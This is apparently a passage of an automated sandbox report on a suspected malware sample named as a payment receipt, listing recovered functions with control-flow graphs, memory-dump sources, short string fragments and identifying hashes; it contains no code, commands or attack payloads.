                                                    control_flow_graph 481 6ef654d-6ef6558 482 6ef655a-6ef65b4 481->482 483 6ef65b5-6ef65e3 481->483 482->483 487 6ef65ea-6ef6644 483->487 488 6ef65e5 483->488 491 6ef6647 487->491 488->487 492 6ef664e-6ef666a 491->492 493 6ef666c 492->493 494 6ef6673-6ef6674 492->494 493->491 493->494 495 6ef670c-6ef6736 493->495 496 6ef67c3-6ef67de 493->496 497 6ef66a3-6ef66b5 493->497 498 6ef67e3-6ef67fa 493->498 499 6ef6820-6ef6890 493->499 500 6ef67ff-6ef681b 493->500 501 6ef66dc-6ef66e0 493->501 502 6ef673b-6ef6771 493->502 503 6ef6679-6ef66a1 493->503 504 6ef66b7-6ef66bf call 6ef7271 493->504 505 6ef6776-6ef678b 493->505 506 6ef6790-6ef67be 493->506 494->499 495->492 496->492 497->492 498->492 522 6ef6892 call 6ef7f7b 499->522 523 6ef6892 call 6ef7cab 499->523 524 6ef6892 call 6ef8918 499->524 525 6ef6892 call 6ef8967 499->525 500->492 507 6ef66f3-6ef66fa 501->507 508 6ef66e2-6ef66f1 501->508 502->492 503->492 516 6ef66c5-6ef66d7 504->516 505->492 506->492 509 6ef6701-6ef6707 507->509 508->509 509->492 516->492 521 6ef6898-6ef68a2 522->521 523->521 524->521 525->521
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q$Te]q$z^I
                                                    • API String ID: 0-3923789156
                                                    • Opcode ID: 2b3499ba9fa59f4e101057a1190d1ad94d7fb664874e18587a4db5dc78aa8398
                                                    • Instruction ID: 5cee6ce231fc748e18eb5e181084bdf9c29402ecdd798aba5b296adb38479baa
                                                    • Opcode Fuzzy Hash: 2b3499ba9fa59f4e101057a1190d1ad94d7fb664874e18587a4db5dc78aa8398
                                                    • Instruction Fuzzy Hash: 5FB16C74E152099FDB44CFAAC8809EEFBF2FF89340F14942AE515AB254DB319901CFA0
                                                    Function 06EF8B28 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 527 6ef8b28-6ef8b4d 529 6ef8b4f 527->529 530 6ef8b54-6ef8b92 call 6ef90d0 527->530 529->530 532 6ef8b98 530->532 533 6ef8b9f-6ef8bbb 532->533 534 6ef8bbd 533->534 535 6ef8bc4-6ef8bc5 533->535 534->532 536 6ef8ded-6ef8df1 534->536 537 6ef8cad-6ef8ccb 534->537 538 6ef8c0b-6ef8c14 534->538 539 6ef8eab-6ef8ed0 534->539 540 6ef8bca-6ef8bce 534->540 541 6ef8da3-6ef8db8 534->541 542 6ef8c40-6ef8c58 534->542 543 6ef8d1f-6ef8d31 534->543 544 6ef8eff-6ef8f16 534->544 545 6ef8dbd-6ef8dc1 534->545 546 6ef8e1d-6ef8e29 534->546 547 6ef8f1b-6ef8f22 534->547 548 6ef8d5b-6ef8d72 534->548 549 6ef8cfa-6ef8d1a 534->549 550 6ef8d77-6ef8d8c 534->550 551 6ef8bf7-6ef8c09 534->551 552 6ef8d36-6ef8d56 534->552 553 6ef8c96-6ef8ca8 534->553 554 6ef8ed5-6ef8ee1 534->554 555 6ef8d91-6ef8d9e 534->555 556 6ef8cd0-6ef8cdc 534->556 535->540 535->547 557 6ef8e04-6ef8e0b 536->557 558 6ef8df3-6ef8e02 536->558 537->533 565 6ef8c27-6ef8c2e 538->565 566 6ef8c16-6ef8c25 538->566 539->533 563 6ef8be1-6ef8be8 540->563 564 6ef8bd0-6ef8bdf 540->564 541->533 569 6ef8c5f-6ef8c75 542->569 570 6ef8c5a 542->570 543->533 544->533 571 6ef8dd4-6ef8ddb 545->571 572 6ef8dc3-6ef8dd2 545->572 559 6ef8e2b 546->559 560 6ef8e30-6ef8e46 546->560 548->533 549->533 550->533 551->533 552->533 553->533 567 6ef8ee8-6ef8efa 554->567 568 6ef8ee3 554->568 555->533 561 6ef8cde 556->561 562 6ef8ce3-6ef8cf5 556->562 573 6ef8e12-6ef8e18 557->573 558->573 559->560 587 6ef8e4d-6ef8e63 560->587 588 6ef8e48 560->588 561->562 562->533 574 6ef8bef-6ef8bf5 563->574 564->574 576 6ef8c35-6ef8c3b 565->576 566->576 567->533 568->567 585 6ef8c7c-6ef8c91 569->585 586 6ef8c77 569->586 570->569 575 6ef8de2-6ef8de8 571->575 572->575 573->533 574->533 575->533 576->533 585->533 586->585 591 6ef8e6a-6ef8e80 587->591 592 6ef8e65 587->592 588->587 594 6ef8e87-6ef8ea6 591->594 595 6ef8e82 591->595 592->591 594->533 595->594
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ry$ry$ry
                                                    • API String ID: 0-128149707
                                                    • Opcode ID: 490b8875f2ff11265d1ba874fc25c3593e4b881d9787995616ad6d1b8640a184
                                                    • Instruction ID: fdaf6f4ca7deb170c9de4c89bcb243fa5aaa88667dc39c7abd0f3eeae9315250
                                                    • Opcode Fuzzy Hash: 490b8875f2ff11265d1ba874fc25c3593e4b881d9787995616ad6d1b8640a184
                                                    • Instruction Fuzzy Hash: 23C169B4E1530ADFDB44CF95C4858AEFBB2FF88311B10A955D601AB358D734AA82CF94
                                                    Function 06EF6521 Relevance: 4.0, Strings: 3, Instructions: 270COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 598 6ef6521-6ef6540 599 6ef659d-6ef65e3 598->599 600 6ef6542-6ef654b 598->600 602 6ef65ea-6ef6644 599->602 603 6ef65e5 599->603 600->599 606 6ef6647 602->606 603->602 607 6ef664e-6ef666a 606->607 608 6ef666c 607->608 609 6ef6673-6ef6674 607->609 608->606 608->609 610 6ef670c-6ef6736 608->610 611 6ef67c3-6ef67de 608->611 612 6ef66a3-6ef66b5 608->612 613 6ef67e3-6ef67fa 608->613 614 6ef6820-6ef6890 608->614 615 6ef67ff-6ef681b 608->615 616 6ef66dc-6ef66e0 608->616 617 6ef673b-6ef6771 608->617 618 6ef6679-6ef66a1 608->618 619 6ef66b7-6ef66bf call 6ef7271 608->619 620 6ef6776-6ef678b 608->620 621 6ef6790-6ef67be 608->621 609->614 610->607 611->607 612->607 613->607 637 6ef6892 call 6ef7f7b 614->637 638 6ef6892 call 6ef7cab 614->638 639 6ef6892 call 6ef8918 614->639 640 6ef6892 call 6ef8967 614->640 615->607 622 6ef66f3-6ef66fa 616->622 623 6ef66e2-6ef66f1 616->623 617->607 618->607 631 6ef66c5-6ef66d7 619->631 620->607 621->607 624 6ef6701-6ef6707 622->624 623->624 624->607 631->607 636 6ef6898-6ef68a2 637->636 638->636 639->636 640->636
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q$Te]q$z^I
                                                    • API String ID: 0-3923789156
                                                    • Opcode ID: 362df6ae05607c70272e5077385d93acf8b0840e323d2eb3990169579da4e166
                                                    • Instruction ID: b7ebb74fdcd1c9125b8269cb5378f991992f3cbe5d32cc360edcad0a1465436b
                                                    • Opcode Fuzzy Hash: 362df6ae05607c70272e5077385d93acf8b0840e323d2eb3990169579da4e166
                                                    • Instruction Fuzzy Hash: EEA12874E152099FDB44CFAAC8809EEFBF2EF89310F24942AE515BB254DB359901CF60
                                                    Function 06EF65C0 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 642 6ef65c0-6ef65e3 643 6ef65ea-6ef6644 642->643 644 6ef65e5 642->644 647 6ef6647 643->647 644->643 648 6ef664e-6ef666a 647->648 649 6ef666c 648->649 650 6ef6673-6ef6674 648->650 649->647 649->650 651 6ef670c-6ef6736 649->651 652 6ef67c3-6ef67de 649->652 653 6ef66a3-6ef66b5 649->653 654 6ef67e3-6ef67fa 649->654 655 6ef6820-6ef6890 649->655 656 6ef67ff-6ef681b 649->656 657 6ef66dc-6ef66e0 649->657 658 6ef673b-6ef6771 649->658 659 6ef6679-6ef66a1 649->659 660 6ef66b7-6ef66bf call 6ef7271 649->660 661 6ef6776-6ef678b 649->661 662 6ef6790-6ef67be 649->662 650->655 651->648 652->648 653->648 654->648 678 6ef6892 call 6ef7f7b 655->678 679 6ef6892 call 6ef7cab 655->679 680 6ef6892 call 6ef8918 655->680 681 6ef6892 call 6ef8967 655->681 656->648 663 6ef66f3-6ef66fa 657->663 664 6ef66e2-6ef66f1 657->664 658->648 659->648 672 6ef66c5-6ef66d7 660->672 661->648 662->648 665 6ef6701-6ef6707 663->665 664->665 665->648 672->648 677 6ef6898-6ef68a2 678->677 679->677 680->677 681->677
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q$Te]q$z^I
                                                    • API String ID: 0-3923789156
                                                    • Opcode ID: faf3fca01eb7fbfb788a6ea2cb1ad92ac1f089ad53cec8f26bf7fc3d024dea2f
                                                    • Instruction ID: f843e83888ae2fa42d3503c1e390458d53d5ea97358b58204b5597d2979c0ced
                                                    • Opcode Fuzzy Hash: faf3fca01eb7fbfb788a6ea2cb1ad92ac1f089ad53cec8f26bf7fc3d024dea2f
                                                    • Instruction Fuzzy Hash: 1891D374E102198FDB48CFAAC984ADDFBB2FF89310F24942AE515BB264D7349905CF54
                                                    Function 06EFF408 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 736 6eff408-6eff43d 737 6eff43f 736->737 738 6eff444-6eff475 736->738 737->738 739 6eff476 738->739 740 6eff47d-6eff499 739->740 741 6eff49b 740->741 742 6eff4a2-6eff4a3 740->742 741->739 743 6eff70f-6eff718 741->743 744 6eff64f-6eff662 741->744 745 6eff68e-6eff6a6 741->745 746 6eff5ac-6eff5b0 741->746 747 6eff4ec-6eff4ff 741->747 748 6eff6ab-6eff6bd 741->748 749 6eff4a8-6eff4ea 741->749 750 6eff547-6eff54a 741->750 751 6eff504-6eff52b 741->751 752 6eff623-6eff64a 741->752 753 6eff5e3-6eff5f6 741->753 754 6eff6c2-6eff6d4 741->754 755 6eff5fb-6eff610 741->755 756 6eff6d9-6eff6f0 741->756 757 6eff578-6eff58f 741->757 758 6eff615-6eff61e 741->758 759 6eff6f5-6eff70a 741->759 760 6eff594-6eff5a7 741->760 761 6eff530-6eff542 741->761 742->743 742->749 762 6eff675-6eff67c 744->762 763 6eff664-6eff673 744->763 745->740 764 6eff5c3-6eff5ca 746->764 765 6eff5b2-6eff5c1 746->765 747->740 748->740 749->740 773 6eff54d call 6ef6a3c 750->773 774 6eff54d call 6eff858 750->774 751->740 752->740 753->740 754->740 755->740 756->740 757->740 758->740 759->740 760->740 761->740 767 6eff683-6eff689 762->767 763->767 769 6eff5d1-6eff5de 764->769 765->769 767->740 768 6eff553-6eff573 768->740 769->740 773->768 774->768
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TuA$UC;"
                                                    • API String ID: 0-2071649361
                                                    • Opcode ID: 2dc262b582afb8c2c2472cb99d3fe769f1684293a152553918f241355d3c4165
                                                    • Instruction ID: e5c5a2ab94c30b169e83d107fc2e494a5094d4f0dc4427cf6885da1372654dd6
                                                    • Opcode Fuzzy Hash: 2dc262b582afb8c2c2472cb99d3fe769f1684293a152553918f241355d3c4165
                                                    • Instruction Fuzzy Hash: 8C911971D25309DFDB48CFA6E5805DEFBB2EF89310F10A52AE515A7268E7309942CF50
                                                    Function 06EFF418 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 775 6eff418-6eff43d 776 6eff43f 775->776 777 6eff444-6eff475 775->777 776->777 778 6eff476 777->778 779 6eff47d-6eff499 778->779 780 6eff49b 779->780 781 6eff4a2-6eff4a3 779->781 780->778 782 6eff70f-6eff718 780->782 783 6eff64f-6eff662 780->783 784 6eff68e-6eff6a6 780->784 785 6eff5ac-6eff5b0 780->785 786 6eff4ec-6eff4ff 780->786 787 6eff6ab-6eff6bd 780->787 788 6eff4a8-6eff4ea 780->788 789 6eff547-6eff54a 780->789 790 6eff504-6eff52b 780->790 791 6eff623-6eff64a 780->791 792 6eff5e3-6eff5f6 780->792 793 6eff6c2-6eff6d4 780->793 794 6eff5fb-6eff610 780->794 795 6eff6d9-6eff6f0 780->795 796 6eff578-6eff58f 780->796 797 6eff615-6eff61e 780->797 798 6eff6f5-6eff70a 780->798 799 6eff594-6eff5a7 780->799 800 6eff530-6eff542 780->800 781->782 781->788 801 6eff675-6eff67c 783->801 802 6eff664-6eff673 783->802 784->779 803 6eff5c3-6eff5ca 785->803 804 6eff5b2-6eff5c1 785->804 786->779 787->779 788->779 812 6eff54d call 6ef6a3c 789->812 813 6eff54d call 6eff858 789->813 790->779 791->779 792->779 793->779 794->779 795->779 796->779 797->779 798->779 799->779 800->779 806 6eff683-6eff689 801->806 802->806 808 6eff5d1-6eff5de 803->808 804->808 806->779 807 6eff553-6eff573 807->779 808->779 812->807 813->807
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TuA$UC;"
                                                    • API String ID: 0-2071649361
                                                    • Opcode ID: 9b402fb69737b53e9e99112d1781ab71388419865fa6e45e07be36da63131dc4
                                                    • Instruction ID: a05f3121e5169b1563534f027cfb2a0bb8e20ccb5f10ed3d3589bc60efea81e0
                                                    • Opcode Fuzzy Hash: 9b402fb69737b53e9e99112d1781ab71388419865fa6e45e07be36da63131dc4
                                                    • Instruction Fuzzy Hash: 9F911871D24309EFDB48CFA6E5805DEFBB2EF89350F10A52AE515A7268E7309942CF50
                                                    Function 06F405F0 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: {#L
                                                    • API String ID: 0-1361971085
                                                    • Opcode ID: 26d41cd44cdbb376dcd4190a136b15d385c8a1827826d5a5e3a1d1bbe3d7fce4
                                                    • Instruction ID: dc041844060cfabd32e9356b83012a65db2e73d345ee55bbd940a33c825b9dcf
                                                    • Opcode Fuzzy Hash: 26d41cd44cdbb376dcd4190a136b15d385c8a1827826d5a5e3a1d1bbe3d7fce4
                                                    • Instruction Fuzzy Hash: C9D11771E05219DFDB58CFAAC58059EFBF2BF89340F14D52AD41AAB228DB309942CF50
                                                    Function 06F405E0 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: {#L
                                                    • API String ID: 0-1361971085
                                                    • Opcode ID: 58aa03eeff0af46e414bc68622f7ab2f6a2cb6488198818de46de1b3869188b1
                                                    • Instruction ID: bb9d354ecdee0a4aa476f9eafd54c4ce88aad81cd460ce7da45872a5f02b5952
                                                    • Opcode Fuzzy Hash: 58aa03eeff0af46e414bc68622f7ab2f6a2cb6488198818de46de1b3869188b1
                                                    • Instruction Fuzzy Hash: 74D11771E05219DFDB58CFAAC98059EFBF2BF89340F14D52AD519AB228DB309942CF50
                                                    Function 023E6F90 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `Yzl
                                                    • API String ID: 0-3906699567
                                                    • Opcode ID: 4becedfbbbd74954fc1f3a086b27e253e4095c31d72d2e837de261a02a570511
                                                    • Instruction ID: ee23da6e8ca9c6246c1e457549d58a6a5aa2109f9ed0217b026c9419cdd7af2e
                                                    • Opcode Fuzzy Hash: 4becedfbbbd74954fc1f3a086b27e253e4095c31d72d2e837de261a02a570511
                                                    • Instruction Fuzzy Hash: 6B91D5B4E00219CFDB54DFA9D994A9EBBB2FF88304F1085A9D419AB365DB309D46CF40
                                                    Function 023E3E28 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `Yzl
                                                    • API String ID: 0-3906699567
                                                    • Opcode ID: 860b2d5c082ae8977dc4ae9927ce8e66b23ae9fa7fb3ea801fa6de90321278cd
                                                    • Instruction ID: 247d7b77309d5a545157db692d638eb4dbbc2ac58e35136c8f2b3756acf3261b
                                                    • Opcode Fuzzy Hash: 860b2d5c082ae8977dc4ae9927ce8e66b23ae9fa7fb3ea801fa6de90321278cd
                                                    • Instruction Fuzzy Hash: 2391D574E00219CFDB58DFA9D994A9DBBB2FF88304F1085A9D419AB365DB309D46CF40
                                                    Function 06EFE3D8 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: iUfo
                                                    • API String ID: 0-3820436262
                                                    • Opcode ID: e55f3ba94abed96dfa31357e8b46e1025bdbe0b6dffed6067fade994c0384a6d
                                                    • Instruction ID: 8843918b40a5f1e90014d7ac40ad4c447ad7a24eeb41d36bbacf1ef10279eaed
                                                    • Opcode Fuzzy Hash: e55f3ba94abed96dfa31357e8b46e1025bdbe0b6dffed6067fade994c0384a6d
                                                    • Instruction Fuzzy Hash: 957124B4E15219AFCB54CFA9D9455EDFBB2FF88300F10946AE505A7264E734AA028F90
                                                    Function 06EFDDE3 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 5=6
                                                    • API String ID: 0-2897083178
                                                    • Opcode ID: 978a312c7558c5af340e1288ca3097243f82d814917c68575ca97207d8cbe5e4
                                                    • Instruction ID: 3141782684821400d76822a3f0565e4b12eab97fca6811953d7be9bd896bce01
                                                    • Opcode Fuzzy Hash: 978a312c7558c5af340e1288ca3097243f82d814917c68575ca97207d8cbe5e4
                                                    • Instruction Fuzzy Hash: EB715874E1530A9FCB44CFA5D9415EEFFB2FF89300B10A92AD115E7264DB349A028F90
                                                    Function 06EFDDF0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 5=6
                                                    • API String ID: 0-2897083178
                                                    • Opcode ID: 815a53c05a664f030c2fc0044786ed63b01784474c6d089f1ddb818819927624
                                                    • Instruction ID: 1f567192f2d4587fc43c970f3fd007b355841eee9bd339c78335e68345fea68d
                                                    • Opcode Fuzzy Hash: 815a53c05a664f030c2fc0044786ed63b01784474c6d089f1ddb818819927624
                                                    • Instruction Fuzzy Hash: 73613774E1530A9FDB44CFA5D9415EEFFB2FF89200B10A52AD116E7214DB349A028F94
                                                    Function 06EFE3E8 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: iUfo
                                                    • API String ID: 0-3820436262
                                                    • Opcode ID: ae987c41076cc8a39ac0ac41017bab645fd586dff7e55c59333b5b75f4b0ad94
                                                    • Instruction ID: 4da0630000c27c77cc75c45aabe10eb4ae4eeca5bae08773464a0bad6b96bc88
                                                    • Opcode Fuzzy Hash: ae987c41076cc8a39ac0ac41017bab645fd586dff7e55c59333b5b75f4b0ad94
                                                    • Instruction Fuzzy Hash: A45114B4E152199FDB54CFA9D4455EEFBB2FF88300F10902AE505B7264EB346A42CF94
                                                    Function 06EF7271 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -2m
                                                    • API String ID: 0-2686427999
                                                    • Opcode ID: 9da059d31507179c8018b0b26c215840afe04a74bfbbaee3983d983f7cb0dabb
                                                    • Instruction ID: b663b1b4ef3f5b674773490c0e5369f60999b167800d168658efb324f2d9355d
                                                    • Opcode Fuzzy Hash: 9da059d31507179c8018b0b26c215840afe04a74bfbbaee3983d983f7cb0dabb
                                                    • Instruction Fuzzy Hash: C25138B0E152099FDB48CFAAD4445EEFBF2EF88300F24E06AD919A7254D7345A41CFA4
                                                    Function 06F4F7B0 Relevance: .6, Instructions: 606COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4065f735436c30ebfa5e501ce3561b1761709f78354b80f72b631a5c976de5ed
                                                    • Instruction ID: bbfc53598a9f343a16e1fb7d184877918c63d56fb8d11827f77e92838644332d
                                                    • Opcode Fuzzy Hash: 4065f735436c30ebfa5e501ce3561b1761709f78354b80f72b631a5c976de5ed
                                                    • Instruction Fuzzy Hash: AB329C30B022148FDB64EB69C990BAEBBF6AFC9300F144469E54ADB7A4DB34DD05CB51
                                                    Function 06F40007 Relevance: .3, Instructions: 279COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7d641d98bbddc55b7d0fc200b0407dc9b8be7d00d2da444deecf5ac071808ae
                                                    • Instruction ID: 897f25cb92ceeca19aecbba886897458122ebe958e4bf2863917b51308eaf4b1
                                                    • Opcode Fuzzy Hash: a7d641d98bbddc55b7d0fc200b0407dc9b8be7d00d2da444deecf5ac071808ae
                                                    • Instruction Fuzzy Hash: DAB14971D0A2099FDB58DFAAC94069EFFB2FF89300F20D46AD515A7255DB349A02CF50
                                                    Function 06F40040 Relevance: .3, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 588c49ed7aa67f21d23c862133542885ca2f3567eb844ed752f81289839830fb
                                                    • Instruction ID: 1e4be3402feb653aa8258133935789992a76f607e47ec0ee470bf1501f4287f7
                                                    • Opcode Fuzzy Hash: 588c49ed7aa67f21d23c862133542885ca2f3567eb844ed752f81289839830fb
                                                    • Instruction Fuzzy Hash: FEB1F671E15209DFDB58DFAAD58069EFBB2FF88300F20E42AD515AB254DB349A06CF50
                                                    Function 05810BD4 Relevance: .3, Instructions: 253COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2654d68b9c5dddb48396b3efea43d33d642403a889009889c995fba45142391f
                                                    • Instruction ID: b00881faf0ac8c0ddae31706be2260f8e658679fe95b3b80966b5812bd40e2b2
                                                    • Opcode Fuzzy Hash: 2654d68b9c5dddb48396b3efea43d33d642403a889009889c995fba45142391f
                                                    • Instruction Fuzzy Hash: 77A19235E003199FCB04DFA5D8949DDFBBAFF89314F148215E81AAB2A0DB30AD85CB51
                                                    Function 058120F0 Relevance: .2, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24c89ca24c9b224b38c094e4abdf77e8616ec24123039f1b4b81ef4b890934c0
                                                    • Instruction ID: 95d16796b265dc5f8b3b74fa69751530c10a68cd0ef6d6683a4b73bed261da45
                                                    • Opcode Fuzzy Hash: 24c89ca24c9b224b38c094e4abdf77e8616ec24123039f1b4b81ef4b890934c0
                                                    • Instruction Fuzzy Hash: 76916235E003199FCB04DFB1D8949DDF7BAFF99314B148215E816AB2A4DB30AD86CB51
                                                    Function 06EF7CAB Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
